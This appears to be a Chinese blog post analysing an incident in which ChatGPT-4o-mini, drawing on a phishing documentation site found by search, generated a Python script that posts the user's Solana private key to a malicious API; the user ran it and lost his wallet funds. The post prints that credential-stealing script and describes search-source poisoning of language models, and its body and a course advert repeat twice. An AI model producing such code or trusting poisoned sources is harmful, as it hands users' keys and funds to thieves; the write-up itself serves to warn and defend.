最新消息: USBMI致力于为网友们分享Windows、安卓、IOS等主流手机系统相关的资讯以及评测、同时提供相关教程、应用、软件下载等服务。

大模型(ChatGPT)“语料污染”第一真实案例

业界 admin 8浏览 0评论

今天看到一个非常有意思的案例,应该说可以载入史册的案例。我最早看有群里转发COS的一个推文:

前排提示,文末有大模型AGI-CSDN独家资料包哦!

然后在hi群发了下,COS看到后跟我说了下大体过程,从受害者r_ocky.eth @r_cky0 的推文:

详见:https://x/r_cky0/status/1859656430888026524

大概说是他在使用ChatGPT编码的时候,GPT给出的代码里调用了一个恶意的API地址,然后更要命的是生成的代码里是直接把"private_key"明文提交给“恶意”API处理,而且这哥们也是老老实实在代码里填写了自己的key,然后还运行了,结果是30分钟后他的钱包被盗(转移到FdiBGKS8noGHY2fppnDgcgCQts95Ww8HSLUvWbzv1NhX这个地址)损失差不多$2.5k刀…

从受害者的推文来看把锅甩给了OpenAI,并表示此次不再信任OpenAI,当然他也第一时间币圈第一神探@COS寻求帮助(是的!如果你在币圈出现任何安全风险,请第一时间联系慢雾,肯定没错!),COS也第一时间做了分析回应:https://x/evilcos/status/1859752658061623593

(因为我开始打错别字了写成了漫雾,所以COS发了这个图帮纠正一下,这应该也是一种语料污染,所以直接发出来提醒下大家)

事情基本清楚了,但是是不是ChatGPT的锅实际上还不是很明了,因为没有搞清楚ChatGPT为什么会给出这个API调用的代码,在受害小哥的推文我们找到了小哥当时的提示词:

this has to be script to buy solana token from pump.fun portal

另外我留意到ChatGPT的回复是包含“References”及“Sources”的,通过COS联系小哥后他给我分享了当时所有跟ChatGPT的会话记录,找到对应的提示词,后可以看到他当时使用了ChatGPT-4o-mini并且确实触发了搜索,点“Sources”可以看到:

所以真相大白了搜索源就是docs.solanaapis 应该同时命中了“solana”跟“pump.fun”两个关键词,所以成为ChatGPT引入的“语料”数据源,我们也就找到文档及github中的演示代码中的API地址:

https://api.solanaapis/pumpfun/buy

根据这些搜索到的“知识”ChatGPT“自然而然”的生成了对应恶意API调用的代码:

import requests``   ``# API Endpoint``api_url = "https://api.solanaapis/pumpfun/buy"``   ``# Replace with your actual private key``private_key = "your_private_key_here"``   ``# Token mint address for HXTh56cHH97ibiNMEtMyMs6ZPAeqy5E9xxxxx``mint_address = "HXTh56cHH97ibiNMEtMyMs6ZPAeqy5E9xxxxx"``   ``# Amount in SOL you wish to spend``amount_in_sol = 0.01  # Example: 0.01 SOL``   ``# Transaction parameters``microlamports = 433000  # Default value``units = 300000          # Default value``slippage = 10           # Example: 10 for 10% slippage``   ``# Payload for the POST request``payload = {`    `"private_key": private_key,`    `"mint": mint_address,`    `"amount": amount_in_sol,`    `"microlamports": microlamports,`    `"units": units,`    `"slippage": slippage``}``   ``try:`    `# Send POST request to the API`    `response = requests.post(api_url, json=payload)`    `response_data = response.json()``   `    `if response.status_code == 200 and response_data.get("status") == "success":`        `print(f"Transaction successful! TXID: {response_data.get('txid')}")`    `else:`        `print(f"Transaction failed: {response_data.get('message', 'Unknown error')}")``   ``except Exception as e:`    `print(f"An error occurred: {e}")``   

然后这个受害者小哥也没注意,直接在代码里填写了自己的private_key,然后本地运行了 … 后面的结果大家都已经知道了…

到这里我们可以整理下整个流程图:

到这里还有一个问题那就是ChatGPT生成的代码为什么会要求把private_key提交给远程API处理呢?实际上从docs.solanaapis “官方”演示代码也是要发送private_key的,所以有理由相信整个docs.solanaapis及对应代码的 github/solanaapisdev 整个项目就是一个彻头彻尾的“钓鱼”项目,用时髦的话说是供应链钓鱼,从本次案例的动机及场景上上讲ChaGPT算是躺枪了,我估计攻击者也没想到ChatGPT会有这么堪称为“神之一手”的完美助攻!!!

如果要OpenAI背锅的话那应该把锅给ChatGPT-Research,因为我用Google搜索了一下“solana”跟“pump.fun”两个关键词,并没有找到docs.solanaapis这个的靠前的搜索

之所以称这个案例可以“载入史册”,我觉得属于可能是第一个真实发生的语料污染带给用户带来损失的案例!其实在我之前内部培训的时候有提到这种语料污染的问题:

本次案例这种API调用是算是非常隐蔽的场景,当然这也是因为Web3这种知识都算是比较新的“知识”,更加容易被“投毒”污染,这次我觉得ChatGPT算是被动“躺枪”,但是下次很可能出现攻击者主动出击的情况!尤其是对新出现的现象级那种爆红的项目,进行优先“占坑”提供完整的知识进行“投毒”污染的可能。大模型相关搜索及代码生成都需要考虑下这种风险场景的可能 …

当然本次案例核心还是受害者小哥的“配合”缺少最基本的概念,即使是一个背景很靠谱官方也不可能直接提交private_key啊~~

读者福利:如果大家对大模型感兴趣,这套大模型学习资料一定对你有用

对于0基础小白入门:

如果你是零基础小白,想快速入门大模型是可以考虑的。

一方面是学习时间相对较短,学习内容更全面更集中。
二方面是可以根据这些资料规划好学习计划和方向。

包括:大模型学习线路汇总、学习阶段,大模型实战案例,大模型学习视频,人工智能、机器学习、大模型书籍PDF。带你从零基础系统性的学好大模型!

😝有需要的小伙伴,可以保存图片到wx扫描二v码免费领取【保证100%免费】🆓

👉AI大模型学习路线汇总👈

大模型学习路线图,整体分为7个大的阶段:(全套教程文末领取哈)

第一阶段: 从大模型系统设计入手,讲解大模型的主要方法;

第二阶段: 在通过大模型提示词工程从Prompts角度入手更好发挥模型的作用;

第三阶段: 大模型平台应用开发借助阿里云PAI平台构建电商领域虚拟试衣系统;

第四阶段: 大模型知识库应用开发以LangChain框架为例,构建物流行业咨询智能问答系统;

第五阶段: 大模型微调开发借助以大健康、新零售、新媒体领域构建适合当前领域大模型;

第六阶段: 以SD多模态大模型为主,搭建了文生图小程序案例;

第七阶段: 以大模型平台应用与开发为主,通过星火大模型,文心大模型等成熟大模型构建大模型行业应用。

👉大模型实战案例👈

光学理论是没用的,要学会跟着一起做,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。

👉大模型视频和PDF合集👈

观看零基础学习书籍和视频,看书籍和视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。

👉学会后的收获:👈

• 基于大模型全栈工程实现(前端、后端、产品经理、设计、数据分析等),通过这门课可获得不同能力;

• 能够利用大模型解决相关实际项目需求: 大数据时代,越来越多的企业和机构需要处理海量数据,利用大模型技术可以更好地处理这些数据,提高数据分析和决策的准确性。因此,掌握大模型应用开发技能,可以让程序员更好地应对实际项目需求;

• 基于大模型和企业数据AI应用开发,实现大模型理论、掌握GPU算力、硬件、LangChain开发框架和项目实战技能, 学会Fine-tuning垂直训练大模型(数据准备、数据蒸馏、大模型部署)一站式掌握;

• 能够完成时下热门大模型垂直领域模型训练能力,提高程序员的编码能力: 大模型应用开发需要掌握机器学习算法、深度学习框架等技术,这些技术的掌握可以提高程序员的编码能力和分析能力,让程序员更加熟练地编写高质量的代码。

👉获取方式:

😝有需要的小伙伴,可以保存图片到wx扫描二v码免费领取【保证100%免费】🆓

今天看到一个非常有意思的案例,应该说可以载入史册的案例。我最早看有群里转发COS的一个推文:

前排提示,文末有大模型AGI-CSDN独家资料包哦!

然后在hi群发了下,COS看到后跟我说了下大体过程,从受害者r_ocky.eth @r_cky0 的推文:

详见:https://x/r_cky0/status/1859656430888026524

大概说是他在使用ChatGPT编码的时候,GPT给出的代码里调用了一个恶意的API地址,然后更要命的是生成的代码里是直接把"private_key"明文提交给“恶意”API处理,而且这哥们也是老老实实在代码里填写了自己的key,然后还运行了,结果是30分钟后他的钱包被盗(转移到FdiBGKS8noGHY2fppnDgcgCQts95Ww8HSLUvWbzv1NhX这个地址)损失差不多$2.5k刀…

从受害者的推文来看把锅甩给了OpenAI,并表示此次不再信任OpenAI,当然他也第一时间币圈第一神探@COS寻求帮助(是的!如果你在币圈出现任何安全风险,请第一时间联系慢雾,肯定没错!),COS也第一时间做了分析回应:https://x/evilcos/status/1859752658061623593

(因为我开始打错别字了写成了漫雾,所以COS发了这个图帮纠正一下,这应该也是一种语料污染,所以直接发出来提醒下大家)

事情基本清楚了,但是是不是ChatGPT的锅实际上还不是很明了,因为没有搞清楚ChatGPT为什么会给出这个API调用的代码,在受害小哥的推文我们找到了小哥当时的提示词:

this has to be script to buy solana token from pump.fun portal

另外我留意到ChatGPT的回复是包含“References”及“Sources”的,通过COS联系小哥后他给我分享了当时所有跟ChatGPT的会话记录,找到对应的提示词,后可以看到他当时使用了ChatGPT-4o-mini并且确实触发了搜索,点“Sources”可以看到:

所以真相大白了搜索源就是docs.solanaapis 应该同时命中了“solana”跟“pump.fun”两个关键词,所以成为ChatGPT引入的“语料”数据源,我们也就找到文档及github中的演示代码中的API地址:

https://api.solanaapis/pumpfun/buy

根据这些搜索到的“知识”ChatGPT“自然而然”的生成了对应恶意API调用的代码:

import requests``   ``# API Endpoint``api_url = "https://api.solanaapis/pumpfun/buy"``   ``# Replace with your actual private key``private_key = "your_private_key_here"``   ``# Token mint address for HXTh56cHH97ibiNMEtMyMs6ZPAeqy5E9xxxxx``mint_address = "HXTh56cHH97ibiNMEtMyMs6ZPAeqy5E9xxxxx"``   ``# Amount in SOL you wish to spend``amount_in_sol = 0.01  # Example: 0.01 SOL``   ``# Transaction parameters``microlamports = 433000  # Default value``units = 300000          # Default value``slippage = 10           # Example: 10 for 10% slippage``   ``# Payload for the POST request``payload = {`    `"private_key": private_key,`    `"mint": mint_address,`    `"amount": amount_in_sol,`    `"microlamports": microlamports,`    `"units": units,`    `"slippage": slippage``}``   ``try:`    `# Send POST request to the API`    `response = requests.post(api_url, json=payload)`    `response_data = response.json()``   `    `if response.status_code == 200 and response_data.get("status") == "success":`        `print(f"Transaction successful! TXID: {response_data.get('txid')}")`    `else:`        `print(f"Transaction failed: {response_data.get('message', 'Unknown error')}")``   ``except Exception as e:`    `print(f"An error occurred: {e}")``   

然后这个受害者小哥也没注意,直接在代码里填写了自己的private_key,然后本地运行了 … 后面的结果大家都已经知道了…

到这里我们可以整理下整个流程图:

到这里还有一个问题那就是ChatGPT生成的代码为什么会要求把private_key提交给远程API处理呢?实际上从docs.solanaapis “官方”演示代码也是要发送private_key的,所以有理由相信整个docs.solanaapis及对应代码的 github/solanaapisdev 整个项目就是一个彻头彻尾的“钓鱼”项目,用时髦的话说是供应链钓鱼,从本次案例的动机及场景上上讲ChaGPT算是躺枪了,我估计攻击者也没想到ChatGPT会有这么堪称为“神之一手”的完美助攻!!!

如果要OpenAI背锅的话那应该把锅给ChatGPT-Research,因为我用Google搜索了一下“solana”跟“pump.fun”两个关键词,并没有找到docs.solanaapis这个的靠前的搜索

之所以称这个案例可以“载入史册”,我觉得属于可能是第一个真实发生的语料污染带给用户带来损失的案例!其实在我之前内部培训的时候有提到这种语料污染的问题:

本次案例这种API调用是算是非常隐蔽的场景,当然这也是因为Web3这种知识都算是比较新的“知识”,更加容易被“投毒”污染,这次我觉得ChatGPT算是被动“躺枪”,但是下次很可能出现攻击者主动出击的情况!尤其是对新出现的现象级那种爆红的项目,进行优先“占坑”提供完整的知识进行“投毒”污染的可能。大模型相关搜索及代码生成都需要考虑下这种风险场景的可能 …

当然本次案例核心还是受害者小哥的“配合”缺少最基本的概念,即使是一个背景很靠谱官方也不可能直接提交private_key啊~~

读者福利:如果大家对大模型感兴趣,这套大模型学习资料一定对你有用

对于0基础小白入门:

如果你是零基础小白,想快速入门大模型是可以考虑的。

一方面是学习时间相对较短,学习内容更全面更集中。
二方面是可以根据这些资料规划好学习计划和方向。

包括:大模型学习线路汇总、学习阶段,大模型实战案例,大模型学习视频,人工智能、机器学习、大模型书籍PDF。带你从零基础系统性的学好大模型!

😝有需要的小伙伴,可以保存图片到wx扫描二v码免费领取【保证100%免费】🆓

👉AI大模型学习路线汇总👈

大模型学习路线图,整体分为7个大的阶段:(全套教程文末领取哈)

第一阶段: 从大模型系统设计入手,讲解大模型的主要方法;

第二阶段: 在通过大模型提示词工程从Prompts角度入手更好发挥模型的作用;

第三阶段: 大模型平台应用开发借助阿里云PAI平台构建电商领域虚拟试衣系统;

第四阶段: 大模型知识库应用开发以LangChain框架为例,构建物流行业咨询智能问答系统;

第五阶段: 大模型微调开发借助以大健康、新零售、新媒体领域构建适合当前领域大模型;

第六阶段: 以SD多模态大模型为主,搭建了文生图小程序案例;

第七阶段: 以大模型平台应用与开发为主,通过星火大模型,文心大模型等成熟大模型构建大模型行业应用。

👉大模型实战案例👈

光学理论是没用的,要学会跟着一起做,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。

👉大模型视频和PDF合集👈

观看零基础学习书籍和视频,看书籍和视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。

👉学会后的收获:👈

• 基于大模型全栈工程实现(前端、后端、产品经理、设计、数据分析等),通过这门课可获得不同能力;

• 能够利用大模型解决相关实际项目需求: 大数据时代,越来越多的企业和机构需要处理海量数据,利用大模型技术可以更好地处理这些数据,提高数据分析和决策的准确性。因此,掌握大模型应用开发技能,可以让程序员更好地应对实际项目需求;

• 基于大模型和企业数据AI应用开发,实现大模型理论、掌握GPU算力、硬件、LangChain开发框架和项目实战技能, 学会Fine-tuning垂直训练大模型(数据准备、数据蒸馏、大模型部署)一站式掌握;

• 能够完成时下热门大模型垂直领域模型训练能力,提高程序员的编码能力: 大模型应用开发需要掌握机器学习算法、深度学习框架等技术,这些技术的掌握可以提高程序员的编码能力和分析能力,让程序员更加熟练地编写高质量的代码。

👉获取方式:

😝有需要的小伙伴,可以保存图片到wx扫描二v码免费领取【保证100%免费】🆓

发布评论

评论列表 (0)

  1. 暂无评论